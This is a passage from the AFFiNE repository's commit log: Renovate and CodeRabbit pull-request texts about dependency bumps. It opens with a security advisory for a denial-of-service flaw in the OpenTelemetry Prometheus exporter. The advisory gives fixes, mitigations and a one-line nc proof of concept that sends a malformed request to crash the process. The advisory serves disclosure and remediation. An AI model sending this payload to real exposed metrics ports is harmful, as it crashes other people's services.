`--require @​opentelemetry/auto-instrumentations-node/register`/`--import @​opentelemetry/auto-instrumentations-node/register` ##### Impact **Denial of service.** Any application using the OpenTelemetry Prometheus exporter’s built-in server can be crashed by a single unauthenticated network packet sent to the metrics port. No authentication, special privileges, or prior access is required. ##### Remediation ##### Update to the fixed version Update `@opentelemetry/exporter-prometheus` and `@opentelemetry/sdk-node` to version **0.217.0** or later. Update `@opentelemetry/auto-instrumentations-node` to version **0.75.0** or later. This release adds proper error handling around the URL constructor, returning an HTTP `400` response on parse failure rather than allowing the exception to propagate and crash the process. ``` npm install @​opentelemetry/exporter-prometheus@latest ``` ##### Do Not Expose the Endpoint to Untrusted Users > [!IMPORTANT] > The following mitigations reduce exposure but do not fully remediate the vulnerability. Any client that *can* reach the metrics endpoint - including your own Prometheus scraper host if compromised - could still trigger the crash. Updating to **0.217.0** is the recommended resolution. If updating is not immediately feasible, restrict access to the metrics endpoint so that it is not reachable by untrusted or unauthenticated network clients. For example: * **Bind to localhost only** by setting the `host` option to `127.0.0.1` when configuring the `PrometheusExporter`, so the port is not exposed on public or shared network interfaces * **Use a firewall or network policy** to restrict access to port `9464` (or whichever port you have configured) to only trusted Prometheus scrape hosts * **Place the endpoint behind a reverse proxy** that filters or validates incoming requests before they reach the exporter ##### Details In `PrometheusExporter.ts`, the `_requestHandler` calls `new URL(request.url, this._baseUrl)` without any error handling. Node's HTTP parser accepts absolute-form URIs (e.g. `http://`) for proxy compatibility, including malformed ones. When `request.url` is `"http://"`, the `URL` constructor throws `TypeError: Invalid URL`. Since there is no try-catch in the handler, the exception propagates as an uncaught exception and crashes the process. The Prometheus metrics endpoint is unauthenticated by design (Prometheus scrapes it) and binds to `0.0.0.0` by default, meaning it is reachable by any network client that can connect to the metrics port. ##### Proof of Concept Start any Node.js application with the Prometheus exporter running on the default port `9464`, then send a single raw TCP packet: ``` echo -ne 'GET http:// HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc localhost 9464 ``` The process crashes immediately with: ``` TypeError: Invalid URL at new URL (...) at PrometheusExporter._requestHandler (...) ``` #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/open-telemetry/opentelemetry-js/security/advisories/GHSA-q7rr-3cgh-j5r3) - [https://github.com/advisories/GHSA-q7rr-3cgh-j5r3](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-q7rr-3cgh-j5r3) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.217.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7...74cde1b674508ccc0ed2601ac43a80ff2d35114c) ### [`v0.216.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/a0476eef3cb973bfcc0c2e41f868dd7b484c2ed8...2400d8389a4469f7a81ccd3be2f0b2c2dd6faaf7) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8cf00738c2 |
feat(server): realtime notification & task status (#14934)
#### PR Dependency Tree * **PR #14934** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Full realtime platform added: live notifications, comments, embedding progress, and transcription task updates via realtime subscriptions. * **Chores** * Frontend switched from polling/GraphQL queries to realtime channels; legacy query fields marked deprecated and client libs updated to use realtime APIs. [](https://app.coderabbit.ai/change-stack/toeverything/AFFiNE/pull/14934) <!-- end of auto-generated comment: release notes by coderabbit.ai --> #### PR Dependency Tree * **PR #14934** 👈 * **PR #14936** This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) |
||
|
|
d64f368623 |
feat(server): refactor copilot (#14892)
#### PR Dependency Tree * **PR #14892** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) |
||
|
|
0ccfacbc29 | feat(docs): migrate bs docs | ||
|
|
cc79fa3c6d |
chore: bump up opentelemetry (#14844)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/api](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/api) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`1.9.0` → `1.9.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fapi/1.9.0/1.9.1) |  |  | | [@opentelemetry/core](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-core) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fcore/2.6.0/2.7.0) |  |  | | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.213.0/0.215.0) |  |  | | [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.6.0/2.7.0) |  |  | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.213.0/0.215.0) |  |  | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.61.0/0.63.0) |  |  | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.213.0/0.215.0) |  |  | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.61.0` → `^0.63.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.61.0/0.63.0) |  |  | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.59.0` → `^0.61.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.59.0/0.61.0) |  |  | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.60.0` → `^0.62.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.60.0/0.62.0) |  |  | | [@opentelemetry/resources](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-resources) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fresources/2.6.0/2.7.0) |  |  | | [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.6.0/2.7.0) |  |  | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.213.0` → `^0.215.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.213.0/0.215.0) |  |  | | [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.6.0` → `2.7.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.6.0/2.7.0) |  |  | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/api)</summary> ### [`v1.9.1`](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/HEAD/CHANGELOG.md#191) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/v1.9.0...v1.9.1) ##### 🐛 (Bug Fix) - fix: avoid grpc types dependency [#​3551](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3551) [@​flarna](https://redirect.github.com/flarna) - fix(otlp-proto-exporter-base): Match Accept header with Content-Type in the proto exporter [#​3562](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3562) [@​scheler](https://redirect.github.com/scheler) - fix: include tracestate in export [#​3569](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3569) [@​flarna](https://redirect.github.com/flarna) ##### 🏠 (Internal) - chore: fix cross project links and missing implicitly exported types [#​3533](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3533) [@​legendecas](https://redirect.github.com/legendecas) - feat(sdk-metrics): add exponential histogram mapping functions [#​3504](https://redirect.github.com/open-telemetry/opentelemetry-js/pull/3504) [@​mwear](https://redirect.github.com/mwear) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0630-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0620-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.63.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0630-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ##### Bug Fixes - **redis-common:** expand redaction to include ACL, CONFIG, PSETEX, GETSET ([#​3472](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3472)) ([39193ca](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/39193cac4124eedc9e8fa5ae16ba960b5ab7a36b)) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.38.2 to ^0.38.3 - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0 ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0620-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0610-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479)) ([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.61.0 to ^0.62.0 ### [`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450)) ([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.60.0 to ^0.61.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a109f069b0 | chore: bump deps | ||
|
|
c6a99eb9cb |
chore: bump deps (#14810)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Updated developer tooling dependencies used for local testing to newer patch versions for improved stability. * Bumped backend framework and related packages to newer patch releases to address fixes and maintain compatibility. * No functional or public API changes; updates are non-breaking dependency version bumps. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
ffc27af3ba |
fix(server): update version check (#14784)
fix #14780 #### PR Dependency Tree * **PR #14784** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Release Notes * **Bug Fixes** * Improved upgrade availability detection to properly compare semantic versions, including support for prerelease and canary versions. The system now accurately identifies when new versions are available, ensuring users receive timely update notifications. * **Tests** * Added comprehensive unit tests for version comparison and upgrade detection functionality. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
5a6c65085a |
feat(mobile): adapt new endpoint (#14778)
#### PR Dependency Tree * **PR #14778** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) |
||
|
|
d3ec008b0c |
chore: bump deps (#14777)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Migration and config commands now feature interactive prompts for required inputs. * **Bug Fixes** * Enhanced error handling in CLI operations. * **Chores** * Updated GraphQL Code Generator toolchain to v6. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
233004f867 | chore: bump oxlint & enable more supported rules (#14769) | ||
|
|
6a93566422 |
chore: bump deps (#14690)
#### PR Dependency Tree * **PR #14690** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Updated package manager and development tooling to latest compatible versions. * Updated backend framework and monitoring dependencies to latest minor/patch releases. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
29a27b561b |
feat(server): migrate copilot to native (#14620)
#### PR Dependency Tree * **PR #14620** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Native LLM workflows: structured outputs, embeddings, and reranking plus richer multimodal attachments (images, audio, files) and improved remote-attachment inlining. * **Refactor** * Tooling API unified behind a local tool-definition helper; provider/adapters reorganized to route through native dispatch paths. * **Chores** * Dependency updates, removed legacy Google SDK integrations, and increased front memory allocation. * **Tests** * Expanded end-to-end and streaming tests exercising native provider flows, attachments, and rerank/structured scenarios. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
9c55edeb62 |
feat(server): adapt gemini3.1 preview (#14583)
#### PR Dependency Tree * **PR #14583** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added Gemini 3.1 Pro Preview support (text, image, audio) and new GPT‑5 variants as defaults; centralized persistent telemetry state for more reliable client identity. * **UX** * Improved model submenu placement in chat preferences. * More robust mindmap parsing, preview, regeneration and replace behavior. * **Chores** * Bumped AI SDK and related dependencies. * **Tests** * Expanded/updated tests and increased timeouts for flaky flows. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
f34e25e122 |
test: migrate test & utils (#14569)
#### PR Dependency Tree * **PR #14569** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Upgraded development test tooling to Vitest v4 and added Playwright browser test integration; normalized test configurations and CI shard matrix. * **Tests** * Added a large suite of new integration tests covering editor flows (edgeless, database, embeds, images, latex, code, clipboard, multi-editor, presentation, undo/redo, etc.). * Removed numerous end-to-end Playwright test suites across the same feature areas. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
7f5f7e79df |
feat(server): refactor mcp (#14579)
#### PR Dependency Tree * **PR #14579** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Full JSON-RPC MCP endpoint with batch requests, per-message validation, method dispatch (initialize, ping, tools/list, tools/call) and request cancellation * Tool listing and execution with input validation, standardized results, and improved error responses * **Chores** * Removed an external protocol dependency * Bumped MCP server version to 1.0.1 <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
fc9b99cd17 |
chore: bump up ava version to v7 (#14563)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.1` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |  |  | | [ava](https://avajs.dev) ([source](https://redirect.github.com/avajs/ava)) | [`^6.4.0` → `^7.0.0`](https://renovatebot.com/diffs/npm/ava/6.4.1/7.0.0) |  |  | --- ### Release Notes <details> <summary>avajs/ava (ava)</summary> ### [`v7.0.0`](https://redirect.github.com/avajs/ava/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/avajs/ava/compare/v6.4.1...v7.0.0) ##### What's Changed - Replace `strip-ansi` with `node:util.stripVTControlCharacters` by [@​fisker](https://redirect.github.com/fisker) in [#​3403](https://redirect.github.com/avajs/ava/pull/3403) - Remove support for Node.js 18 and 23; require 20.19 or newer, 22.20 or newer or 24,12 or newer; update dependencies including transitive `glob` by [@​novemberborn](https://redirect.github.com/novemberborn) in [#​3416](https://redirect.github.com/avajs/ava/pull/3416) **Full Changelog**: <https://github.com/avajs/ava/compare/v6.4.1...v7.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about these updates again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40OC4xIiwidXBkYXRlZEluVmVyIjoiNDMuNDguMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
76d28aaa38 |
chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest)) | [`^6.0.2` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My40My4yIiwidXBkYXRlZEluVmVyIjoiNDMuNDMuMiIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c5d622531c | feat: refactor copilot module (#14537) | ||
|
|
e249e2e884 |
chore: bump up opentelemetry (#14543)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0) |  |  | | [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1) |  |  | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`0.38.2` → `0.38.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3) |  |  | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0) |  |  | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.58.0` → 